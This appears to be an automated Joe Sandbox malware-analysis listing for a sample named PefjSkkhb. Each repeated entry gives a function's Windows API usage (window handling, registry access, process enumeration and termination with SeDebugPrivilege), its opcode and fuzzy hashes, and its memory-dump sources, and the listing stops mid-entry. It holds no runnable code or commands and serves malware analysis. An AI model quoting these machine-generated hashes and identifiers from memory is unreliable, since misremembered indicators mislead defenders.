                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3210457359-0
                                                                                                                                                                                                                    • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                                                                                                                                                    • Instruction ID: 7d660afb621b298ad5991cdc98dec93e318533ce78eaa734f343409df18a2c02
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6561B021A0954B86FB349B65C4407BA2261EF947A8F184B39DA1DE7ED5CE7FE480D700
                                                                                                                                                                                                                    Function 00007FF656D60B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                    • API String ID: 3721556410-2107944366
                                                                                                                                                                                                                    • Opcode ID: 0ba7ae17dd64f5cd2cd54aa28a81cf6dcf970af09ebab124b560fc2629746610
                                                                                                                                                                                                                    • Instruction ID: 545298265f4fc1d2a12d1fdedd82f73c835863014bf0745b6229cc32dd9029e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba7ae17dd64f5cd2cd54aa28a81cf6dcf970af09ebab124b560fc2629746610
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3617E72A18A5285EB10DF61E8805ED3770FB84B98F581B32DD1EA3BA5CE3AE545C740
                                                                                                                                                                                                                    Function 00007FF656D4E580 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                    • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                                                                                                                                                    • Instruction ID: 309271598011d5c344542ffa4475c0ad8af0868796b39d7856b1db410301ff5a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F551A362E0868282FB00DB26C49037C7B60FF84B95F498A31D64E977A6DFBDE440CB04
                                                                                                                                                                                                                    Function 00007FF656D2A070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                    • String ID: 2$P
                                                                                                                                                                                                                    • API String ID: 93392585-1110268094
                                                                                                                                                                                                                    • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                                                                                                                                    • Instruction ID: fb60d33641dbae00fd5ec1c408c753e8a92c72c8e26c288e47c1a872fbe59a25
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B51A132A0864289F7608F66E8402BD77A5FF407A8F2C4B35DA59A6695CF3EE485C700
                                                                                                                                                                                                                    Function 00007FF656D5E248 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$LongMessageSend$Show
                                                                                                                                                                                                                    • String ID: '
                                                                                                                                                                                                                    • API String ID: 257662517-1997036262
                                                                                                                                                                                                                    • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                                                                                                                                                    • Instruction ID: 4dee3b360bb7b01d1c1019d189b016f07107754caf16ce3d793c529fba3f8d27
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B51E832A0864285F774AB66A454A7D3750FB95BD1F5C4B31CE5EA3BA1CE3EE442C700
                                                                                                                                                                                                                    Function 00007FF656D2AD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                    • API String ID: 4060274358-404129466
                                                                                                                                                                                                                    • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                                                                                                                                                    • Instruction ID: 3cf419951d51772cc6ab63437cfce6cf9e82e4a98ef738a5ef86959bbab521a8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8216925B0C78381FB949B26A90017A6365EF85780F4C5B31DD4DE77A5EE7EE842C740
                                                                                                                                                                                                                    Function 00007FF656D2C5C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                    • API String ID: 4051287042-3128320259
                                                                                                                                                                                                                    • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                                                                                                                                                    • Instruction ID: 045df31012a71d34417bd57b78056e3a418ea1f9f70694abc3ba57a189818518
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1118471B18B8692D7708B10F8447EA3360FB88784F885736EA4EA3B58DE7DD189C740
                                                                                                                                                                                                                    Function 00007FF656D6233C Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1211466189-0
                                                                                                                                                                                                                    • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                                                                                                                                                    • Instruction ID: 5a89b94c11ddedc1196129003bd1e4b614acfaff62e95beb4f92ed7c4b02e93c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71A11432B1868382EB788F25D154B7977A0FB94B84F185735DE0AA3A94DF3EE851C740
                                                                                                                                                                                                                    Function 00007FF656D4FCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 50796853-0
                                                                                                                                                                                                                    • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                                                                                                                                                    • Instruction ID: 7e5cdd46e016114c423ef52efa6cc28f1599999d9b884aea46f5b1995ad7e37e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBB17E72B0864286EB10DF65D0903BC6770EF95B88F488631DA4EA7BA6CF7ED505C744
                                                                                                                                                                                                                    Function 00007FF656CD443C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                                                    • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                                                                                                                                                    • Instruction ID: 42fefe993369f9296f60fc4404dc88ce6ca974573bc60f2e009dfa39d2e7e182
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6517471E4C28288FB655B29D44437927B19F82B44F1C87B1C60EEA6D9CE7EE4C4C240
                                                                                                                                                                                                                    Function 00007FF656D590A8 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                                                                                    • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                                                                                                                                                    • Instruction ID: 911e5d1163b0f547e147da11fd9c5f89ed2511bf2172aee0d8e29cf094a73823
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96419A3661868187E7248B22F444B6ABBA0F799BD1F184635EF8A97F54DF3ED440CB00
                                                                                                                                                                                                                    Function 00007FF656CF0BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                                                                                                                                                                    • Instruction ID: d6133ff2fbf9cd703dcb9a6f82f9d6b657dcbf78674c588ba366e6057de6136f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEC1E5A2B0C68286EBA18F15946127EBBB1BF40F84F5D4135DA4EA7795CE3EE840C741
                                                                                                                                                                                                                    Function 00007FF656D309C4 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                                                    • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                                                                                                                                                    • Instruction ID: 2f4140b6db2d72844ee4b434e86fe3380879a8e8b712b266abea509100fed19b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89A19A62B1864286FF549B65C4843BC27A0EB44B88F1D4B31DA0EEB691DF7EE480C350
                                                                                                                                                                                                                    Function 00007FF656CB2100 Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                                                                                                    • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                                                                                                                                                    • Instruction ID: 1c64c3ed50307d233aa684eeb91b39380d8dfb7121ef17d06b85dbefd9ea2386
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08A1A1B2A186C087D7748F19E40466EBB75FB85BD4F584225EA8A63B68CF3DD442CF01
                                                                                                                                                                                                                    Function 00007FF656D5FB28 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendWindow$Enabled
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3694350264-0
                                                                                                                                                                                                                    • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                                                                                                                                                    • Instruction ID: 7624158dcda33538177ecf35990a553d08d6a2d5fa70de1e5b1ec61d242488e3
